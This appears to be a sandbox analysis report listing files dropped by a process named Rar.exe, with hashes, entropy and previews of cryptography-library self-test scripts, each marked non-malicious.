                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/test_pkcs1_15.py: Self-test for PKCS#1 v1.5 encryption..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..#
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22796
                                                                                                                                                                                                                                  Entropy (8bit):4.426757156222012
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:jebGB32D5suEeAnSI9lA3tsxE3WtahvrAhMxHM7jI/+Il:SK2DOuxA/v2t+MhKM7mIl
                                                                                                                                                                                                                                  MD5:473FEB7F8AE236A1D02B3A61AE7B5514
                                                                                                                                                                                                                                  SHA1:9B1A0F819C8511085A16B8D50A337B52A6367713
                                                                                                                                                                                                                                  SHA-256:22DA3EC31421A2552198EF2AE00E6019DF85CBEAC74D428A50DF9CD6AB7210CA
                                                                                                                                                                                                                                  SHA-512:2377F27C15BD33D2BC9EA87C706B9BD981623B1394CDDBE49F2E8A76B6167C00128A476774B1FBADF5D17DBF95E160DF661FDBB110A2A6E3B4652DDC3E06D2BE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/test_pkcs1_oaep.py: Self-test for PKCS#1 OAEP encryption..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                                  Entropy (8bit):5.141658250590196
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:NtwwEIB0jcQHMsvI/S3oCFCqD0sISG+CMAE+dNg+o2+HX+Lj+EqkIt08k42iNTZI:wwfFQHvoUgd7oXHuL6EsLN1m9mArB
                                                                                                                                                                                                                                  MD5:89BDBFC47A5DCA90A45F4EF652DD7101
                                                                                                                                                                                                                                  SHA1:A9C8FFA344033B3EC5B43A5DAA3DA64EEAEB704E
                                                                                                                                                                                                                                  SHA-256:62225A7DF06D003A465C3BA5612F695BADB31559152C1492354B5C44A0A63BB5
                                                                                                                                                                                                                                  SHA-512:C665CDC1CA849D15EDA7AB0D9E26E4DCE1CF76CDCD4CD5E942691BD9017994EB39787828CB3131AD41ED90C1887FF856D68B2FA0DD2B14F74724A0A1E59F8342
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/__init__.py: Self-test for hash modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH TH
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10168
                                                                                                                                                                                                                                  Entropy (8bit):4.841216501855338
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ywdQHvXNIIqigCKOstqEZQY20Pe38Iy0yhFTolQycPIFZiU:yUeXNTY20238Iy0yhO+yB
                                                                                                                                                                                                                                  MD5:84B9FB90649EE10FEC0136B69073C4C1
                                                                                                                                                                                                                                  SHA1:8F804BA750722F19CCAC8B22915563FB3EDB0A85
                                                                                                                                                                                                                                  SHA-256:6AA885ED7E71F39C2197E822A1867B806660F4CBF4FC8E8197C3A0ED492272F4
                                                                                                                                                                                                                                  SHA-512:78B2A90CF9AF1E7CAEFC7BC83B9B18089013AAE849DC7D8E00B86E1BF5D399869B98D14362429D5C9576D3BD577914AE164B71E2E6489F6A8EDF40B8312B39D8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/common.py: Common code for Crypto.SelfTest.Hash..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16796
                                                                                                                                                                                                                                  Entropy (8bit):4.783532264114981
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:0rskrs9Vq5HZgqlLXNSvBrpJ2mlv/Io2mDdlSvyIxs2g:0r6qbgqlDNSvZpJDlv/IoDTSvQ2g
                                                                                                                                                                                                                                  MD5:63C8BAAC2382F26688A38B881323D894
                                                                                                                                                                                                                                  SHA1:005EECF1A5129FF2FD3350DF3F5561B87B1026F2
                                                                                                                                                                                                                                  SHA-256:D0770C758F2BD4BBFAC6C111050928550D39BB48254E2A9DA3934B40937FCD9F
                                                                                                                                                                                                                                  SHA-512:135B94C2F4C5E53B1206F6AD70FDC5D3E89C47DF842920951ED75917CD4E4CA0EB2B0E3BC60F31F70F6368612B7BB4BF07EA02BFFDEB5FC0276B3D365B08A0D3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13808
                                                                                                                                                                                                                                  Entropy (8bit):5.08051172614129
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Nqrskrs9t3q/Iiuaov/mlD7Y2v6W3nVJiUQkK/OroaaOh:krskrs9VqBm2LFJjK2Hl
                                                                                                                                                                                                                                  MD5:70594C0C5C1D69E570F8115F02EC0FDF
                                                                                                                                                                                                                                  SHA1:6B6BB2EF4F4C0BF757485FDF8EA0043F773F1D77
                                                                                                                                                                                                                                  SHA-256:9158FFBC96E70A527A5D5758A3E9D98D9DC8905818FB747A1A800A294A17D320
                                                                                                                                                                                                                                  SHA-512:19CB67F0CC67F4876D9319558C27118E34C2AF3DB7094CBB358BFC1A159396F5C3AF29EF39F1F1FDFF718C01159D9230651E6F92C1739D07486CC7E412EE2C87
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# SelfTest/Hash/CMAC.py: Self-test for the CMAC module..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO E
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20489
                                                                                                                                                                                                                                  Entropy (8bit):5.153740738312008
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:UwdQHvJzEI5mSHorDwxwwbTc9untXdDGVoyGZ6GoGd4q1EGhEGmKOuCdliWErLOp:UUe9O6orMTc9upR2oya6b04q1EEEYmB
                                                                                                                                                                                                                                  MD5:D0E673489A9A73F4F6A9C8F8A12E6F1B
                                                                                                                                                                                                                                  SHA1:61EB91C23346DD275DAA966EB6BC3BBCE71288C9
                                                                                                                                                                                                                                  SHA-256:1F8AD7D399CE6D2449F3413E26BF73403860C79114807776DA866E29E764606A
                                                                                                                                                                                                                                  SHA-512:AAEAF15D71C6AC3EA55A64A60E6E51A0DF37AA36FC21E5952D539E15BA781CC22C57CE907D858BF10EF12DEF87CD1696CD3D2FCD594008C6544A8BC787498FC4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/HMAC.py: Self-test for the HMAC module..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12050
                                                                                                                                                                                                                                  Entropy (8bit):4.62363520730185
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:KCuRMf+Lb6RdXoVtMocxo1wBofWuFo/JAo1wBofWC+Po1wBofWFO0tzCerYb+Oa:l586Rd4T5FuhTFdFmO0tYb6
                                                                                                                                                                                                                                  MD5:01EFB03BD8164982157BB85495EEA984
                                                                                                                                                                                                                                  SHA1:1ACB78C5EDFFD8E3029CE23AD2361D9E0D80D884
                                                                                                                                                                                                                                  SHA-256:3BD587FF74064862E669CDFB0AFC6EF1489E751C9F67746757F0CC3F4F62D0E3
                                                                                                                                                                                                                                  SHA-512:65C3FEF9E21662C45C57ED544F9956E8AF6FE072115084CF52FFC796FB30CC98DC03B96A838DA895DFDDBB8B5B00FBDAD3E8FAE2DD8F5CAA8D0E4301A9576684
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..from binascii import unhexlify, hexlify....from Crypto.Util.py3compat import tobytes..from Crypto.Util.strxor import strxor_c..from Crypto.SelfTest.st_common import list_test_cases....from Crypto.Hash import KMAC128, KMAC256......class KMACTest(unittest.TestCase):.... def new(self, *args, **kwargs):.. return self.KMAC.new(key=b'X' * (self.minimum_key_bits // 8), *args, **kwargs).... def test_new_positive(self):.... key = b'X' * 32.... h = self.new().. for new_func in self.KMAC.new, h.new:.... for dbytes in range(self.minimum_bytes, 128 + 1):.. hobj = new_func(key=key, mac_len=dbytes).. self.assertEqual(hobj.digest_size, dbytes).... digest1 = new_func(key=key, data=b"\x90").digest().. digest2 = new_func(key=key).update(b"\x90").digest().. self.assertEqual(digest1, digest2).... new_func(data=b"A", key=key, custom=b"g").... hobj = h.new(key=key)..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12085
                                                                                                                                                                                                                                  Entropy (8bit):5.069402054924231
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Gqrskrs9t3q/IEPNfCuz+CSwVR7RRUpWCtuAbHQNXa8aXiJm6mkmGrrDkcpMgw9d:xrskrs9VqrPNfC6RLCtuA52FBf3s974G
                                                                                                                                                                                                                                  MD5:51BC6116F75310E905FF849BFAD261E3
                                                                                                                                                                                                                                  SHA1:677B0343C2B13AC9A1EFA4A0BDB6EA131F2C9E86
                                                                                                                                                                                                                                  SHA-256:0C889CE5DD48A302E3B9F9319CAD868CF7B12361715FD5DD4E37EF26259A50E8
                                                                                                                                                                                                                                  SHA-512:1791D19938C5F45CB2A7F784379662DB7230F74A060A12FD7C50EAF55962FE76F855FA4DFDDA1E502739FCC1FBD3A58675AA0CA804C48CBCF8E2854B6BF411E7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,..# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2386
                                                                                                                                                                                                                                  Entropy (8bit):5.563614742388662
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:NIwEIB0jcQHMsvI/S3oCFlYp+Qk0Y3h18+7L0Tk1CTIDdTzJcw+aZa:6wfFQHvovpHkPs+YoaIDdXJ9+B
                                                                                                                                                                                                                                  MD5:EE0B8F5FA22BF119A11D2D9A320CEC0C
                                                                                                                                                                                                                                  SHA1:9D6632F341660A75B70291F2F42888842B0897A1
                                                                                                                                                                                                                                  SHA-256:A909BD63262259EF3E795AA112FAAA10FDD71C713948834CACE1619818B2DBBA
                                                                                                                                                                                                                                  SHA-512:418A6ABA57CB0BD4AC03F7465706884B41FBFA7A4A56DFABEB93D4BB845A4ABAB78B82DE7A47C85FA4AFC25B1EE4F56A4EDF18D3158DCA7BEDAF1BFB12EDCDD2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/MD2.py: Self-test for the MD2 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WIT
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2411
                                                                                                                                                                                                                                  Entropy (8bit):5.564357195995625
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:N/YPwEIB0jcQHMsvI/S3oCFlYk+Qk0Y3bSQxLgy9eTkM1CT+B1DdTycJcw8aZa:KPwfFQHvoZkHkPrZj9mkwa+XDdNJ98B
                                                                                                                                                                                                                                  MD5:B169D3B94C943706AD3069C14BD5EE3B
                                                                                                                                                                                                                                  SHA1:69A066643B88A30482167E6C7C827739735C37D1
                                                                                                                                                                                                                                  SHA-256:A2149F6DB57F2E73130C7EC05F8895C6DF475A46DF25C860EC3801D97C630CB0
                                                                                                                                                                                                                                  SHA-512:D7C8A4DE5785693F7E03521D5938393A0297E33C46B476B8798C2603FB04238CAE66C9253DF91B2E1228B14DEEE9D7A67EE7ED1BDF5BED3D801875F1EDA2E203
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/MD4.py: Self-test for the MD4 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WIT
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3378
                                                                                                                                                                                                                                  Entropy (8bit):5.487737815096217
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:CwfFQHvoiH2wrrPTp3zSKfah0alZ5WymRbm8bOB:CwdQHvjTcv04ZCbOB
                                                                                                                                                                                                                                  MD5:00D21F3FD88D5FFF84B6390BD49F5789
                                                                                                                                                                                                                                  SHA1:26C99A545ED37788AAC8DD8B97E1365661ABDEC2
                                                                                                                                                                                                                                  SHA-256:4CF30101B12752C5921278CC8C04B52B8A603E3BC2736CBF5E7166C38210C805
                                                                                                                                                                                                                                  SHA-512:74F52B434107741F0CD5DADC342083FFF15BF4C669CA06A53DF866666A020C7932E55A8DC5AA59ADB634F3E409E32811657783FAF6509A4440987AB7811C976E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/MD5.py: Self-test for the MD5 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WIT
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18839
                                                                                                                                                                                                                                  Entropy (8bit):5.021901108374911
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Lqrskrs9t3q/IzdWAzvcZ4ftgR248rY9JEbh419x2Z4IKcSni/BY5+paPGznuHOp:Orskrs9VqdAuhV3Em19asn75lGznuC
                                                                                                                                                                                                                                  MD5:308A4FB6F5356DA99DE36AE855E234FD
                                                                                                                                                                                                                                  SHA1:F0C625216F21221E46F9394F99C3B1D9346BB287
                                                                                                                                                                                                                                  SHA-256:2973B56CFC48F62BA1FEC363877340BCCE4C99AD7870733389996B2404C454C9
                                                                                                                                                                                                                                  SHA-512:4BBF414177BB791C2EBA9FB2C3CEB9B4B28477B7AAE6B29FFF066F3F3B8A6D92C9618985352CE5B0825520C2900666D7E4A5A8998F51B332DE5A1D7161467535
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# SelfTest/Hash/test_Poly1305.py: Self-test for the Poly1305 module..#..# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISC
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2734
                                                                                                                                                                                                                                  Entropy (8bit):5.5822326330531045
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:N6wEIB0jcQHMsvI/S3oCFmn+Qk0Y8ZD72mvhPmLluTyReW1CTv/3asdTjyJcwrJq:EwfFQHvoDHkP8ZD73BIl2xeav/3asdC4
                                                                                                                                                                                                                                  MD5:C094CE0002F8AB6D589F019925301DBE
                                                                                                                                                                                                                                  SHA1:3AE527E1FA4439B853635F73E2D3D56BCBCF992B
                                                                                                                                                                                                                                  SHA-256:7349C09C56BA9A32364240EA09F439F0857CA8373ECF0AE72E4B5E352F64A5AB
                                                                                                                                                                                                                                  SHA-512:42B6A9C710BE47EAA8AB1C265CEF62713041310061B2AA7597BCBE7D59627998341582A6497B4113AFAAE11150E35F85689E1FC975BF9F10D392F831DB573200
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_RIPEMD160.py: Self-test for the RIPEMD-160 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3010
                                                                                                                                                                                                                                  Entropy (8bit):5.250435036736198
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:NH9wEIB0jcQHMsvI/S3oCFlZtjT+syLT097MSGrdTldgjIoQ8ZSkqIhF6raZa:rwfFQHvooBH4u7fGrd/g28ZSEhgrB
                                                                                                                                                                                                                                  MD5:8E777572B29546D060E07444E25D92F8
                                                                                                                                                                                                                                  SHA1:47D40F9DCE353BF1FD82CF1469EB5E44A267A1A4
                                                                                                                                                                                                                                  SHA-256:DBD7878B214ACC6D24164B67B5161BF6AF4EDCCA3BC498DCCB6B27A360D7F3CC
                                                                                                                                                                                                                                  SHA-512:9C76B2890733937AF44E0872755DA84DF81CEB3FB438D78AAB1640B1072D47871566FC62CC7ADD98E41DD0CB4211A098D29556DB2A189F8CA2699CF0D1987CE7
                                                                                                                                                                                                                                  Malicious:false
